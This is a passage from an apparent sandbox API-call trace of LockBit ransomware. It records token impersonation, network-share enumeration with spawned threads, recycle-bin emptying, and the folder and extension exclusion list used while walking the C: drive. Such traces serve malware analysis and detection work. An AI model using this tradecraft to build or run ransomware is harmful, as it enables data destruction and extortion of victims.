dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.773] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x2f8 [0073.773] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.773] CloseHandle (hObject=0x2f8) returned 1 [0073.773] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.774] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x2f8 [0073.774] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.774] CloseHandle (hObject=0x2f8) returned 1 [0073.774] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.775] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x2f8 [0073.775] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.775] CloseHandle (hObject=0x2f8) returned 1 [0073.775] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.776] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x2f8 [0073.776] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.776] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.776] CloseHandle (hObject=0x2fc) returned 1 [0073.776] CloseHandle (hObject=0x2f8) returned 1 [0073.776] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.776] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x2f8 [0073.777] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.777] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.777] CloseHandle (hObject=0x2fc) returned 1 [0073.777] CloseHandle (hObject=0x2f8) returned 1 [0073.777] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0073.777] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x2f8 [0073.778] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.778] CloseHandle (hObject=0x2f8) returned 1 [0073.778] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.778] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x2f8 [0073.778] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.779] CloseHandle (hObject=0x2f8) returned 1 [0073.779] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0073.779] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x2f8 [0073.779] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.779] CloseHandle (hObject=0x2f8) returned 1 [0073.779] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0073.780] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x2f8 [0073.780] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.780] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.780] DuplicateToken (in: ExistingTokenHandle=0x2fc, ImpersonationLevel=0x2, DuplicateTokenHandle=0x3aefdd0 | out: DuplicateTokenHandle=0x3aefdd0*=0x300) returned 1 [0073.780] SetThreadToken (Thread=0x0, Token=0x300) returned 1 [0073.780] CloseHandle (hObject=0x300) returned 1 [0073.780] CloseHandle (hObject=0x2fc) returned 1 [0073.780] CloseHandle (hObject=0x2f8) returned 1 [0073.780] CloseHandle (hObject=0x2f4) returned 1 [0073.781] GetLogicalDrives () returned 0x4 [0073.781] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0073.781] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x3aeff54 | out: lphEnum=0x3aeff54*=0x55fa78) returned 0x0 [0076.114] malloc (_Size=0x4000) returned 0x1fad0a8 [0076.115] WNetEnumResourceW (in: hEnum=0x55fa78, lpcCount=0x3aeff4c, lpBuffer=0x1fad0a8, lpBufferSize=0x3aeff48 | out: lpcCount=0x3aeff4c, lpBuffer=0x1fad0a8, lpBufferSize=0x3aeff48) returned 0x0 [0076.115] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fad0a8, lphEnum=0x3aeff2c | out: lphEnum=0x3aeff2c*=0x572ee0) returned 0x0 [0076.565] malloc (_Size=0x4000) returned 0x1fb14b8 [0076.566] WNetEnumResourceW (in: hEnum=0x572ee0, lpcCount=0x3aeff24, lpBuffer=0x1fb14b8, lpBufferSize=0x3aeff20 | out: lpcCount=0x3aeff24, lpBuffer=0x1fb14b8, lpBufferSize=0x3aeff20) returned 0x103 [0076.566] free (_Block=0x1fb14b8) [0076.566] WNetCloseEnum (hEnum=0x572ee0) returned 0x0 [0076.618] malloc (_Size=0x400) returned 0x1fb14b8 [0076.618] NtCreateThreadEx (in: ThreadHandle=0x3aeff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x1fb14b8, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3aeff2c*=0x1f8, lpBytesBuffer=0x0) returned 0x0 [0076.618] NtSetInformationThread (ThreadHandle=0x1f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0076.618] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fad0c8, lphEnum=0x3aeff2c | out: lphEnum=0x3aeff2c*=0x1f8) returned 0x4b8 [0112.125] malloc (_Size=0x400) returned 0x2071818 [0112.125] NtCreateThreadEx (in: ThreadHandle=0x3aeff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x2071818, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3aeff2c*=0x1e4, lpBytesBuffer=0x0) returned 0x0 [0112.128] NtSetInformationThread (ThreadHandle=0x1e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0112.128] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fad0e8, lphEnum=0x3aeff2c | out: lphEnum=0x3aeff2c*=0x1e4) returned 0x4c6 [0112.129] malloc (_Size=0x400) returned 0x3d70048 [0112.130] NtCreateThreadEx (in: ThreadHandle=0x3aeff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x3d70048, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3aeff2c*=0x1ec, lpBytesBuffer=0x0) returned 0x0 [0112.130] NtSetInformationThread (ThreadHandle=0x1ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0112.130] WNetEnumResourceW (in: hEnum=0x55fa78, lpcCount=0x3aeff4c, lpBuffer=0x1fad0a8, lpBufferSize=0x3aeff48 | out: lpcCount=0x3aeff4c, lpBuffer=0x1fad0a8, lpBufferSize=0x3aeff48) returned 0x103 [0112.130] free (_Block=0x1fad0a8) [0112.131] WNetCloseEnum (hEnum=0x55fa78) returned 0x0 [0112.131] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0112.131] RtlExitUserThread (Status=0x0) Thread: id = 22 os_tid = 0x9d4 [0074.381] GetLogicalDrives () returned 0x4 [0074.381] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0074.382] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x3c2ff54 | out: lphEnum=0x3c2ff54*=0x55fa38) returned 0x0 [0076.113] malloc (_Size=0x4000) returned 0x1fa90a0 [0076.114] WNetEnumResourceW (in: hEnum=0x55fa38, lpcCount=0x3c2ff4c, lpBuffer=0x1fa90a0, lpBufferSize=0x3c2ff48 | out: lpcCount=0x3c2ff4c, lpBuffer=0x1fa90a0, lpBufferSize=0x3c2ff48) returned 0x0 [0076.114] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fa90a0, lphEnum=0x3c2ff2c | out: lphEnum=0x3c2ff2c*=0x572ea0) returned 0x0 [0076.221] malloc (_Size=0x4000) returned 0x1fb10b0 [0076.221] WNetEnumResourceW (in: hEnum=0x572ea0, lpcCount=0x3c2ff24, lpBuffer=0x1fb10b0, lpBufferSize=0x3c2ff20 | out: lpcCount=0x3c2ff24, lpBuffer=0x1fb10b0, lpBufferSize=0x3c2ff20) returned 0x103 [0076.222] free (_Block=0x1fb10b0) [0076.222] WNetCloseEnum (hEnum=0x572ea0) returned 0x0 [0076.222] malloc (_Size=0x400) returned 0x1fb10b0 [0076.222] NtCreateThreadEx (in: ThreadHandle=0x3c2ff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x1fb10b0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3c2ff2c*=0x164, lpBytesBuffer=0x0) returned 0x0 [0076.222] NtSetInformationThread (ThreadHandle=0x164, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0076.222] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fa90c0, lphEnum=0x3c2ff2c | out: lphEnum=0x3c2ff2c*=0x164) returned 0x4b8 [0095.191] malloc (_Size=0x400) returned 0x2071008 [0095.191] NtCreateThreadEx (in: ThreadHandle=0x3c2ff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x2071008, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3c2ff2c*=0x13dc, lpBytesBuffer=0x0) returned 0x0 [0095.192] NtSetInformationThread (ThreadHandle=0x13dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0095.192] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x1fa90e0, lphEnum=0x3c2ff2c | out: lphEnum=0x3c2ff2c*=0x13dc) returned 0x4c6 [0095.196] malloc (_Size=0x400) returned 0x2071410 [0095.196] NtCreateThreadEx (in: ThreadHandle=0x3c2ff2c, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a590, lpParameter=0x2071410, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x3c2ff2c*=0x13d8, lpBytesBuffer=0x0) returned 0x0 [0095.197] NtSetInformationThread (ThreadHandle=0x13d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0095.197] WNetEnumResourceW (in: hEnum=0x55fa38, lpcCount=0x3c2ff4c, lpBuffer=0x1fa90a0, lpBufferSize=0x3c2ff48 | out: lpcCount=0x3c2ff4c, lpBuffer=0x1fa90a0, lpBufferSize=0x3c2ff48) returned 0x103 [0095.197] free (_Block=0x1fa90a0) [0095.246] WNetCloseEnum (hEnum=0x55fa38) returned 0x0 [0095.246] RtlExitUserThread (Status=0x0) Thread: id = 23 os_tid = 0x9e4 [0074.378] wsprintfW (in: param_1=0x3d6fb28, param_2="%s\\*" | out: param_1="C:\\\\*") returned 5 [0074.378] FindFirstFileExW (in: lpFileName="C:\\\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6fd38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6fd38) returned 0x55f9f8 [0074.379] FindClose (in: hFindFile=0x55f9f8 | out: hFindFile=0x55f9f8) returned 1 [0074.379] wsprintfW (in: param_1=0x3d6f720, param_2="%s\\%S" | out: param_1="C:\\\\oqxrwqwdlodagsb") returned 19 [0074.379] CreateFileW (lpFileName="C:\\\\oqxrwqwdlodagsb" (normalized: "c:\\oqxrwqwdlodagsb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000100, hTemplateFile=0x0) returned 0x310 [0074.407] malloc (_Size=0x410) returned 0x1fa8c88 [0074.411] SHEmptyRecycleBinW (hwnd=0x0, pszRootPath="C:\\", dwFlags=0x7) returned 0x8000ffff [0076.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x3d6f648, lpTotalNumberOfBytes=0x3d6f638, lpTotalNumberOfFreeBytes=0x3d6f640 | out: lpFreeBytesAvailableToCaller=0x3d6f648, lpTotalNumberOfBytes=0x3d6f638, lpTotalNumberOfFreeBytes=0x3d6f640) returned 1 [0076.574] SetThreadUILanguage (LangId=0x409) returned 0x409 [0076.575] StrFormatByteSize64A (in: qdw=0xecbff000, pszBuf=0x7f, cchBuf=0x3d6f6b8 | out: pszBuf=0x7f) returned="511 GB" [0076.575] StrFormatByteSize64A (in: qdw=0x5ccb6000, pszBuf=0x79, cchBuf=0x3d6f650 | out: pszBuf=0x79) returned="485 GB" [0076.575] wsprintfA (in: param_1=0x3d6f928, param_2="%S %s total / %s free" | out: param_1="C:\\ 511 GB total / 485 GB free") returned 30 [0076.575] wvsprintfA (in: param_1=0x3d6f0a0, param_2="C:\\ 511 GB total / 485 GB free", arglist=0x3d6f5e0 | out: param_1="C:\\ 511 GB total / 485 GB free") returned 30 [0076.575] wsprintfA (in: param_1=0x3d6f0a0, param_2="%s\r\n" | out: param_1="C:\\ 511 GB total / 485 GB free\r\n") returned 32 [0076.575] GetLocalTime (in: lpSystemTime=0x3d6f5a0 | out: lpSystemTime=0x3d6f5a0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0x39a)) [0076.575] wsprintfA (in: param_1=0x3d6f4a0, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0076.576] SetThreadUILanguage (LangId=0x409) returned 0x409 [0076.576] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0076.601] WriteFile (in: hFile=0x7, lpBuffer=0x3d6f4a0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x3d6f5cc, lpOverlapped=0x0 | out: lpBuffer=0x3d6f4a0*, lpNumberOfBytesWritten=0x3d6f5cc*=0xb, lpOverlapped=0x0) returned 1 [0076.601] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0076.601] WriteFile (in: hFile=0x7, lpBuffer=0x3d6f0a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x3d6f5cc, lpOverlapped=0x0 | out: lpBuffer=0x3d6f0a0*, lpNumberOfBytesWritten=0x3d6f5cc*=0x20, lpOverlapped=0x0) returned 1 [0076.602] GetConsoleWindow () returned 0x5011c [0076.602] IsWindowVisible (hWnd=0x5011c) returned 0 [0076.602] wsprintfW (in: param_1=0x3d6e9c8, param_2="%s\\*" | out: param_1="C:\\\\*") returned 5 [0076.602] FindFirstFileExW (in: lpFileName="C:\\\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6ede8) returned 0x55fd38 [0076.602] lstrcmpiW (lpString1=".", lpString2="$Recycle.Bin") returned 1 [0076.602] lstrcmpiW (lpString1="..", lpString2="$Recycle.Bin") returned 1 [0076.603] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$windows.~bt") returned -1 [0076.603] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="intel") returned -1 [0076.603] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="msocache") returned -1 [0076.603] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$recycle.bin") returned 0 [0076.603] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d6ee2c, dwReserved1=0x76c29c48, cFileName="Boot", cAlternateFileName="")) returned 1 [0076.603] lstrcmpiW (lpString1=".", lpString2="Boot") returned -1 [0076.603] lstrcmpiW (lpString1="..", lpString2="Boot") returned -1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="$windows.~bt") returned 1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="intel") returned -1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="msocache") returned -1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="$recycle.bin") returned 1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="$windows.~ws") returned 1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="tor browser") returned -1 [0076.603] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0076.603] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x3d6ee2c, dwReserved1=0x76c29c48, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0076.603] lstrcmpiW (lpString1=".", lpString2="bootmgr") returned -1 [0076.603] lstrcmpiW (lpString1="..", lpString2="bootmgr") returned -1 [0076.603] PathFindExtensionW (pszPath="bootmgr") returned="" [0076.603] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bootmgr") returned 1 [0076.603] lstrcmpiW (lpString1="ntldr", lpString2="bootmgr") returned 1 [0076.603] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bootmgr") returned 1 [0076.603] lstrcmpiW (lpString1="bootsect.bak", lpString2="bootmgr") returned 1 [0076.603] lstrcmpiW (lpString1="autorun.inf", lpString2="bootmgr") returned -1 [0076.603] lstrcmpiW (lpString1="thumbs.db", lpString2="bootmgr") returned 1 [0076.603] lstrcmpiW (lpString1="iconcache.db", lpString2="bootmgr") returned 1 [0076.604] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0076.604] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3d6ee2c, dwReserved1=0x76c29c48, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0076.604] lstrcmpiW (lpString1=".", lpString2="BOOTSECT.BAK") returned -1 [0076.604] lstrcmpiW (lpString1="..", lpString2="BOOTSECT.BAK") returned -1 [0076.604] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0076.604] lstrcmpiW (lpString1=".386", lpString2=".BAK") returned -1 [0076.604] lstrcmpiW (lpString1=".cmd", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".exe", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".ani", lpString2=".BAK") returned -1 [0076.604] lstrcmpiW (lpString1=".adv", lpString2=".BAK") returned -1 [0076.604] lstrcmpiW (lpString1=".theme", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".msi", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".msp", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".com", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".diagpkg", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".nls", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".diagcab", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".lock", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".ocx", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".mpa", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".cpl", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".mod", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".hta", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".icns", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".prf", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".rtp", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".diagcfg", lpString2=".BAK") returned 1 [0076.604] lstrcmpiW (lpString1=".msstyles", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".bin", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".hlp", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".shs", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".drv", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".wpx", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".bat", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".rom", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".msc", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".spl", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".ps1", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".msu", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".ics", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".key", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".mp3", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".reg", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".dll", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".ini", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".idx", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".sys", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".hlp", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".ico", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".lnk", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".rdp", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1=".lockbit", lpString2=".BAK") returned 1 [0076.605] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BOOTSECT.BAK") returned 1 [0076.605] lstrcmpiW (lpString1="ntldr", lpString2="BOOTSECT.BAK") returned 1 [0076.605] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BOOTSECT.BAK") returned 1 [0076.606] lstrcmpiW (lpString1="bootsect.bak", lpString2="BOOTSECT.BAK") returned 0 [0076.606] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d6ee2c, dwReserved1=0x76c29c48, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0076.606] lstrcmpiW (lpString1=".", lpString2="Config.Msi") returned -1 [0076.606] lstrcmpiW (lpString1="..", lpString2="Config.Msi") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="$windows.~bt") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="intel") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="msocache") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="$recycle.bin") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="$windows.~ws") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="tor browser") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="boot") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="system volume information") returned 